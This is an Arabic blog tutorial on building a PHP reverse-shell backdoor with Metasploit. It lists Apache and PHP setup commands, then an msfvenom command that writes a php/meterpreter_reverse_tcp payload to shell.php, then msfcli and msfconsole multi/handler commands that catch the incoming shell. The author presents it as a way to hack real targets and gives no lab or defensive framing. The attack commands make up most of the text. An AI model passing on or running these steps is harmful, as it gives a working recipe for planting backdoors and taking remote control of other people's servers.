advertisements
كيفكم حبآيبي ان شاء الله الجميع بخير وفي صحة وعافية
مستلزمات لتطبيق على جهازك :
Apache2
Php shell
Metasploit
امر تنصيب Apache :
sudo apt-get install apache2
لقرائة PHP على السرفر :
sudo apt-get install libapache2-mod-php5
تصريح ملف PHP :
chmod 644 file.php
الأن نمر مباشرة الى تريمنال ونكتب امر تالي
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.11 LPORT=81 -f raw > shell.php
شرح اوامر :
P: تعني بايلود
LHOST : عنوان ايبي الخاص بك سواء الخارجي او داخلي
LPORT: بورت الذي ستصل عليه البايلود
F Raw : Format Raw
البايلود الذي اخترناه بعد استغلال يقوم باتصال بجهازنا على بورت المحدد فوق ,
ملاحظة : يجب اظافة وسوم بي اتش بي للباكدور RAW FORMAT
<? php ?>
وبعدها نكتب امر تالي :
msfcli multi/handler LHOST=192.168.1.11 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E
E: exploit
طيب امر واضح شغلنا سكريبت msfcli لتسريع امر شوي طبعا هذا السكريبت يستعمل
عموما في عمل شروحات يعني
غير صالح لو حبيت تخترق حقيقة الهدف ,,, ﻻزمك تفتح تريمنال.
لذلك في حالة وجود المشاكيل نقوم بانتقال الى طريقة المعتادة
msfconsole
use multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.1.11
set lport 81
exploit
0 commentaires :
Enregistrer un commentaire